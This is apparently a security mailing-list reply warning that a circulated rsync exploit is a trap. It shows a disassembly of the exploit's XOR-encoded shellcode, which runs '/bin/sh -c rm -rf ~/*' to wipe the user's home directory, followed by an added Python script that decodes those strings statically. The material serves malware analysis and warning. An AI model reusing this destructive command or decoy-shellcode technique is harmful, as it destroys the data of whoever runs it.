Message-ID: <40B7D37A.8050508@thievco.com>
From: BlueBoar at thievco.com (Blue Boar)
Subject: new rsync :) exploit rsync-too-open

dkey wrote:
> "nice mail"...but if somebody wants to use it, check the shellcode first...i
> think it deletes all your files in your home dir. i'm not sure, maybe
> somebody else can check it...

Yes.

seg000:00000000 ; Segment type: Pure code
seg000:00000000 seg000 segment byte public 'CODE' use32
seg000:00000000 assume cs:seg000
seg000:00000000 assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing
seg000:00000000 jmp short loc_12
seg000:00000002
seg000:00000002 ; =============== S U B R O U T I N E =======================================
seg000:00000002
seg000:00000002
seg000:00000002 sub_2 proc near ; CODE XREF: sub_2+10.p
seg000:00000002 pop esi ; ESI = addr of decode section
seg000:00000003 xor ecx, ecx ; ECX = 0
seg000:00000005 mov cl, 75 ; loop 75 times
seg000:00000007 mov al, 255 ; XOR value start
seg000:00000009
seg000:00000009 decode_loop: ; CODE XREF: sub_2+C.j
seg000:00000009 xor [esi], al ; XOR current byte in decode section with AL
seg000:0000000B dec al ; AL = AL - 1
seg000:0000000D inc esi ; next byte
seg000:0000000E loop decode_loop
seg000:00000010 jmp short decoded
seg000:00000012 ; ---------------------------------------------------------------------------
seg000:00000012
seg000:00000012 loc_12: ; CODE XREF: seg000:00000000.j
seg000:00000012 call sub_2 ; push addr of decode section
seg000:00000017
seg000:00000017 decoded: ; CODE XREF: sub_2+E.j
seg000:00000017 call loc_41 ; push addr of "\bin\sh"
seg000:00000017 ; ---------------------------------------------------------------------------
seg000:0000001C aBinSh db '/bin/sh',0
seg000:00000024 aSh db 'sh',0
seg000:00000027 aC db '-c',0
seg000:0000002A aRmRf2DevNull db 'rm -rf ~/* 2>/dev/null',0
seg000:00000041 ; ---------------------------------------------------------------------------
seg000:00000041
seg000:00000041 loc_41: ; CODE XREF: sub_2+15.p
seg000:00000041 pop ebp ; EBP = addr of "\bin\sh"
seg000:00000042 xor eax, eax ; EAX = 0
seg000:00000042 sub_2 endp
seg000:00000042
seg000:00000044 push eax ; 0
seg000:00000045 lea ebx, [ebp+0Eh]
seg000:00000048 push ebx ; "rm -rf ~/* 2>/dev/null"
seg000:00000049 lea ebx, [ebp+0Bh]
seg000:0000004C push ebx ; "-c"
seg000:0000004D lea ebx, [ebp+8]
seg000:00000050 push ebx ; "sh"
seg000:00000051 mov ebx, ebp ; "/bin/sh"
seg000:00000053 mov ecx, esp
seg000:00000055 xor edx, edx ; EDX = 0
seg000:00000057 mov al, 0Bh
seg000:00000059 int 80h ; LINUX - sys_execve
seg000:0000005B mov ebx, eax ; EBX = result
seg000:0000005D xor eax, eax
seg000:0000005F inc eax ; exit (1)
seg000:00000060 int 80h ; LINUX - sys_exit
seg000:00000060
seg000:00000060 seg000 ends
seg000:00000060 end

AKA "/bin/sh -c rm -rf ~/* 2>/dev/null"

BB
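The decoder loop in the listing above (XOR each byte with AL, then decrement AL, 75 times) is the part a reviewer has to undo before the embedded strings become readable. The following Python is an added example, not part of Blue Boar's message or of the posted exploit: it re-implements that loop statically so the string table and the execve argument layout can be recovered without executing anything. The encoded table it works on is constructed here by applying the same transform to the plaintext table the disassembler showed; the surrounding code bytes of the real payload are not reproduced, and the offsets and starting key are read straight from the listing.

```python
"""Static recovery of the strings hidden by the decode_loop in the listing.

Added example (not from the original post). Re-implements the loop body
(xor [esi],al ; dec al ; inc esi) in Python so the command can be read
without running the payload. ENCODED_TABLE is constructed by applying that
same transform to the string table IDA recovered; no instruction bytes of
the real blob are included.
"""
from typing import List, Tuple

DECODE_START = 0x17   # label `decoded`: ESI after `pop esi` (return addr of call sub_2)
TABLE_START = 0x1C    # label aBinSh: first byte of the string table
START_KEY = 0xFF      # `mov al, 255`

# lea ebx,[ebp+N] offsets from the listing, ordered as execve sees them:
# path ("/bin/sh"), then argv[0], argv[1], argv[2]
ARGV_OFFSETS: Tuple[int, ...] = (0x00, 0x08, 0x0B, 0x0E)


def key_at(offset_from_decode_start: int, start_key: int = START_KEY) -> int:
    """Value AL holds when decode_loop reaches a given byte of the decode section."""
    return (start_key - offset_from_decode_start) & 0xFF


def xor_decrementing_key(data: bytes, key: int) -> bytes:
    """Run the decode_loop body over `data` with AL starting at `key`.

    XOR is its own inverse, so the same routine encodes and decodes.
    """
    out = bytearray()
    for b in data:
        out.append(b ^ key)
        key = (key - 1) & 0xFF   # `dec al` wraps from 0 to 0xFF
    return bytes(out)


def c_strings(region: bytes) -> List[str]:
    """strings(1)-style view: split a NUL-terminated table into Python strings."""
    return [p.decode("ascii", errors="replace") for p in region.split(b"\x00") if p]


def argv_from_table(table: bytes, offsets: Tuple[int, ...] = ARGV_OFFSETS) -> List[str]:
    """Rebuild [path, argv0, argv1, argv2] from the table using the lea offsets."""
    result = []
    for off in offsets:
        end = table.index(b"\x00", off)
        result.append(table[off:end].decode("ascii"))
    return result


# Constructed sample: the plaintext table exactly as the listing shows it, and its
# encoded form as it would sit in the blob. The table begins 5 bytes into the
# decode section, so the loop reaches it with AL == 0xFA.
PLAIN_TABLE = b"/bin/sh\x00sh\x00-c\x00rm -rf ~/* 2>/dev/null\x00"
ENCODED_TABLE = xor_decrementing_key(PLAIN_TABLE, key_at(TABLE_START - DECODE_START))


def recover_command(encoded_table: bytes = ENCODED_TABLE) -> Tuple[str, List[str]]:
    """Decode the table and return (path, argv) as the int 80h execve would see them."""
    decoded = xor_decrementing_key(encoded_table, key_at(TABLE_START - DECODE_START))
    fields = argv_from_table(decoded)
    return fields[0], fields[1:]


if __name__ == "__main__":
    path, argv = recover_command()
    print("execve path :", path)
    print("argv        :", argv)
    print("shell line  :", path, " ".join(argv[1:]))
```

Because the key is derived from the byte's distance from the `decoded` label rather than hard-coded, the same `key_at` call recovers any other region of the 75-byte decode window once its offset is known from the listing; the output of `recover_command()` is the "/bin/sh -c rm -rf ~/* 2>/dev/null" line the message ends with.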